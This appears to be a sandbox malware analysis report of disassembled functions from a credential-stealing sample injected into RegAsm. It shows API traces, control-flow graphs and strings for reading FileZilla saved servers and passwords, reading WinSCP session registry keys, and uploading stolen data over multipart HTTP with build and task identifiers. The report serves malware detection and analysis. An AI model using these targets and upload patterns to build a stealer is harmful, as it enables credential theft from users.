                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                        • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                        • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                        • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$bb7310eab4245006f125c442da2d1e50$block$build_id$file_data
                                                                                                                                                        • API String ID: 2638065154-2126246112
                                                                                                                                                        • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                                                        • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                                                                        • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                                                        • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98
                                                                                                                                                        Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                                                        • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                        • API String ID: 4146028692-935134978
                                                                                                                                                        • Opcode ID: c1ac500929c8bcecca57bced9797f236eb44086586931c87b46499e0801f6c1a
                                                                                                                                                        • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                                                                        • Opcode Fuzzy Hash: c1ac500929c8bcecca57bced9797f236eb44086586931c87b46499e0801f6c1a
                                                                                                                                                        • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                                                                                                        Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598networkstringmemoryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 451 406bb5-406c7a call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 466 406c82-406c88 451->466 467 406c7c 451->467 468 40763e-407666 InternetCloseHandle call 408048 466->468 469 406c8e-406e18 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 466->469 467->466 474 4076a5-40773e call 402920 * 4 call 401cde call 402920 * 3 call 41d016 468->474 475 407668-4076a0 call 410549 call 410609 call 41058d call 402920 468->475 469->468 549 406e1e-406e58 HttpOpenRequestA 469->549 475->474 550 407632-407638 InternetCloseHandle 549->550 551 406e5e-406e64 549->551 550->468 552 406e82-4075cf call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 551->552 553 406e66-406e7c InternetSetOptionA 551->553 792 407611-407629 InternetReadFile 552->792 553->552 793 4075d1-4075d9 792->793 794 40762b-40762c InternetCloseHandle 792->794 793->794 795 4075db-40760c call 410609 call 41058d call 402920 793->795 794->550 795->792
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                                                                                        • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040755D
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                                                                                        • _memmove.LIBCMT ref: 00407578
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                                                                                        • _memmove.LIBCMT ref: 004075A1
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00407644
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                        • String ID: "$"$"$"$"$------$------$------$------$------$------$bb7310eab4245006f125c442da2d1e50$build_id$mode$status$task_id
                                                                                                                                                        • API String ID: 3702379033-3696598438
                                                                                                                                                        • Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                                                        • Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
                                                                                                                                                        • Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                                                        • Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8
                                                                                                                                                        Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 801 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 816 406000 801->816 817 406006-40600c 801->817 816->817 818 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 817->818 819 4066ff-406727 InternetCloseHandle call 408048 817->819 818->819 895 4061a2-4061dc HttpOpenRequestA 818->895 825 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 819->825 826 406729-406761 call 410549 call 410609 call 41058d call 402920 819->826 826->825 896 4061e2-4061e8 895->896 897 4066f3-4066f9 InternetCloseHandle 895->897 898 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 896->898 899 4061ea-406200 InternetSetOptionA 896->899 897->819 1042 4066d2-4066ea InternetReadFile 898->1042 899->898 1043 406692-40669a 1042->1043 1044 4066ec-4066ed InternetCloseHandle 1042->1044 1043->1044 1045 40669c-4066cd call 410609 call 41058d call 402920 1043->1045 1044->897 1045->1042
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                        • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,bb7310eab4245006f125c442da2d1e50,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                        • _memmove.LIBCMT ref: 00406639
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                        • _memmove.LIBCMT ref: 00406662
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                        • String ID: "$"$"$------$------$------$------$bb7310eab4245006f125c442da2d1e50$build_id$mode
                                                                                                                                                        • API String ID: 3702379033-4256281111
                                                                                                                                                        • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                                                        • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                                                                        • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                                                        • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8
                                                                                                                                                        Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1051 40e186-40e231 call 423c10 * 4 RegOpenKeyExA 1060 40e237-40e262 RegGetValueA 1051->1060 1061 40e6b8-40e6ce call 401cde call 41d016 1051->1061 1062 40e264-40e26a 1060->1062 1063 40e287-40e28d 1060->1063 1062->1061 1065 40e270-40e282 1062->1065 1063->1062 1066 40e28f-40e295 1063->1066 1065->1061 1068 40e297-40e2a3 1066->1068 1069 40e2a9-40e2c1 RegOpenKeyExA 1066->1069 1068->1069 1069->1061 1073 40e2c7-40e2e8 RegEnumKeyExA 1069->1073 1073->1062 1075 40e2ee-40e2f9 call 4104e7 1073->1075 1077 40e2fe-40e3dd call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 RegGetValueA call 410609 call 41058d call 402920 RegGetValueA 1075->1077 1096 40e42d-40e454 call 410609 call 41058d call 402920 1077->1096 1097 40e3df-40e42b call 412406 call 4105c7 call 41058d call 402920 * 2 1077->1097 1108 40e459-40e569 call 410609 call 41058d call 402920 RegGetValueA call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 RegGetValueA call 410609 call 41058d call 402920 StrCmpCA 1096->1108 1097->1108 1138 40e5d1-40e636 call 410609 call 41058d call 402920 RegEnumKeyExA 1108->1138 1139 40e56b-40e590 call 40dca0 1108->1139 1138->1077 1154 40e63c-40e698 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 1138->1154 1145 40e592 1139->1145 1146 40e594-40e5cb call 410609 call 41058d call 402920 call 40f030 1139->1146 1145->1146 1146->1138 1167 40e69a-40e6a6 1154->1167 1168 40e6ad-40e6b3 call 402920 1154->1168 1167->1168 1168->1061
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1B7
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1D7
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1E8
                                                                                                                                                        • _memset.LIBCMT ref: 0040E1F9
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
